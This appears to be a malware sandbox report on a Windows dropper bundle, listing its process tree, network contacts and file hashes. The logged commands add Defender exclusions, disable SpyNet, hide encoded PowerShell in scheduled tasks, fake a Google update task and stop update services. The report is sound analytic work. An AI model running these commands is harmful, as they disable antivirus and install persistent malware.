
"C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp" /SL4 $8004C "C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe" 2846236 52224

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

"C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3800 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231006063457" --session-guid=a0bc4cf9-0752-4633-b8fd-4d8b1f4e1e8c --server-tracking-blob=OWQyODRmMDBmYWNhNTJlZTNkZGUxODA4Y2NmMjljNTc2ZWQ0ZDRmMmI3NTY5N2VmNDFiYTBjYTk1OTEwMTU1MTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjU3NDA5Mi44MTk0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIzZGY0OGNkMC1hNjQ3LTQ0ZDYtYWQyNS04MGEzOTc2NjQ2MTgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4804000000000000

C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe

"C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe"

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

"C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6d708538,0x6d708548,0x6d708554

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe

"C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe"

C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp" /SL5="$402CE,5025136,832512,C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zSEF32.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSF201.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Users\Admin\Pictures\UoE0rZ1e2TyOqz5gXFtrvWZo.exe

"C:\Users\Admin\Pictures\UoE0rZ1e2TyOqz5gXFtrvWZo.exe"

C:\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\8758677____.exe" /S /UID=lylal220

C:\Users\Admin\AppData\Local\Temp\is-TPBS9.tmp\_isetup\_setup64.tmp

helper 105 0x3B4

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp

"C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp" /SL5="$50234,491750,408064,C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe"

C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe

"C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f178538,0x6f178548,0x6f178554

C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe

"C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe"

C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe

"C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

"C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe" --silent --allusers=0

C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe

"C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

"C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gjBQkZxno" /SC once /ST 00:36:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gjBQkZxno"

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe

"C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-89M97.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-89M97.tmp\lightcleaner.tmp" /SL5="$701F2,833775,56832,C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gjBQkZxno"

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bAutabDQFHrvmwrWbf" /SC once /ST 06:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\fYpCWIb.exe\" F9 /UIsite_idHTo 385120 /S" /V1 /F

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\Assistant_103.0.4928.16_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\Assistant_103.0.4928.16_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310060634571\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x5f1588,0x5f1598,0x5f15a4

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

"C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe"

C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe

"C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\fYpCWIb.exe

C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\fYpCWIb.exe F9 /UIsite_idHTo 385120 /S

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
US 8.8.8.8:53 update.wf udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 drivelikea.com udp
US 8.8.8.8:53 hbn42414.beget.tech udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 lancetjournal.com udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 galandskiyher4.com udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 grupoeca.co udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 link.storjshare.io udp
US 85.217.144.143:80 85.217.144.143 tcp
DE 148.251.234.93:443 yip.su tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 188.114.96.0:443 lancetjournal.com tcp
US 188.114.96.0:443 lancetjournal.com tcp
NL 13.227.219.122:443 downloads.digitalpulsedata.com tcp
US 172.67.187.122:443 lycheepanel.info tcp
RU 91.212.166.16:443 update.wf tcp
RU 87.236.19.5:80 hbn42414.beget.tech tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 winterhunter.org udp
US 72.29.85.225:443 grupoeca.co tcp
US 104.21.20.38:443 winterhunter.org tcp
NL 194.169.175.127:80 galandskiyher4.com tcp
RU 212.193.49.228:80 goboh2b.top tcp
US 8.8.8.8:53 potatogoose.com udp
US 104.21.35.235:443 potatogoose.com tcp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 122.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 122.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 16.166.212.91.in-addr.arpa udp
US 8.8.8.8:53 5.19.236.87.in-addr.arpa udp
US 8.8.8.8:53 38.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 225.85.29.72.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 235.35.21.104.in-addr.arpa udp
US 8.8.8.8:53 d062.userscloud.net udp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 136.0.77.2:80 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 features.opera-api2.com udp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.106:443 features.opera-api2.com tcp
NL 82.145.216.23:443 download.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.176:443 download3.operacdn.com tcp
US 8.8.8.8:53 demo.seafile.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 106.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 23.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.97.0:443 m7val1dat0r.info tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
DE 52.219.169.230:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 230.169.219.52.in-addr.arpa udp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
NL 94.142.138.113:80 94.142.138.113 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 113.138.142.94.in-addr.arpa udp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
RU 87.240.132.72:80 vk.com tcp
US 8.8.8.8:53 72.132.240.87.in-addr.arpa udp
RU 87.240.132.72:443 vk.com tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
NL 94.142.138.113:80 94.142.138.113 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.23:443 download.opera.com tcp
US 8.8.8.8:53 datasheet.fun udp
US 104.21.89.251:80 datasheet.fun tcp
US 8.8.8.8:53 251.89.21.104.in-addr.arpa udp
US 8.8.8.8:53 59.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp

Files

memory/3432-0-0x00007FF6D62E0000-0x00007FF6D66F0000-memory.dmp

memory/4892-5-0x000001CE629B0000-0x000001CE629D2000-memory.dmp

memory/4892-6-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

memory/4892-7-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/4892-8-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/4892-11-0x000001CE62B60000-0x000001CE62BD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ufvokg2y.5xw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4892-24-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/3432-27-0x00007FF6D62E0000-0x00007FF6D66F0000-memory.dmp

memory/4060-42-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4060-43-0x00000000738B0000-0x0000000073F9E000-memory.dmp

memory/4060-48-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4892-51-0x000001CE629A0000-0x000001CE629B0000-memory.dmp

memory/4892-55-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

MD5 3aabd684cee6bd8d66cb6b0cdd39f427
SHA1 efb2a6e24f860b36993362bab5978fe87c11d94b
SHA256 26bc8d3858f2512979aef222a18c60a22d4fa26541ed0226e31fafb36028441d
SHA512 32854d24b70ab5983bb3c54949162317beeb936df81fe0ad7927e89dd865dcbd51d6a6c5db293a148c916787826c9940c25f2aa6fddb395c73fe88d81019eef4

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

MD5 3aabd684cee6bd8d66cb6b0cdd39f427
SHA1 efb2a6e24f860b36993362bab5978fe87c11d94b
SHA256 26bc8d3858f2512979aef222a18c60a22d4fa26541ed0226e31fafb36028441d
SHA512 32854d24b70ab5983bb3c54949162317beeb936df81fe0ad7927e89dd865dcbd51d6a6c5db293a148c916787826c9940c25f2aa6fddb395c73fe88d81019eef4

C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe

MD5 36225cb2e4a6d6f60d2f0132c0b19072
SHA1 f6ab6d846c924d5ef38025b32b521891f43d187c
SHA256 95f7d3916f7e6ca3d855c7bfa3fb549ce6fec2e1c4ee3e4e04ba0ef55a419bd4
SHA512 a3c93d81aa15c86fd4ae78142e722c88adba23f203c21e4ab8c90dfc45402b3b226de664c90a659691ce6f40ce41a6789a28b12cfec3af7888b133138c599170

C:\Users\Admin\Pictures\f6HIBpWZz6vXG4h2PgTe8JUo.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

memory/2348-77-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe

MD5 36225cb2e4a6d6f60d2f0132c0b19072
SHA1 f6ab6d846c924d5ef38025b32b521891f43d187c
SHA256 95f7d3916f7e6ca3d855c7bfa3fb549ce6fec2e1c4ee3e4e04ba0ef55a419bd4
SHA512 a3c93d81aa15c86fd4ae78142e722c88adba23f203c21e4ab8c90dfc45402b3b226de664c90a659691ce6f40ce41a6789a28b12cfec3af7888b133138c599170

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

MD5 cfc408dc44c357b7945e09f37f5a0f84
SHA1 0a63edb32f421127f5cb106667f967bf33a774ef
SHA256 051f2d78b7632727deed70bdbe9f41f5a8f94d8f7e596b70eaa6da72fa0412aa
SHA512 5ea4178af48fd0bf213ff06dd1406f153cacd98d28f772d47e617e82fcd2fd78d6559a507c39d51e8351c2e783a8375800f8feebaa622403f7d8fe8feb784b92

C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
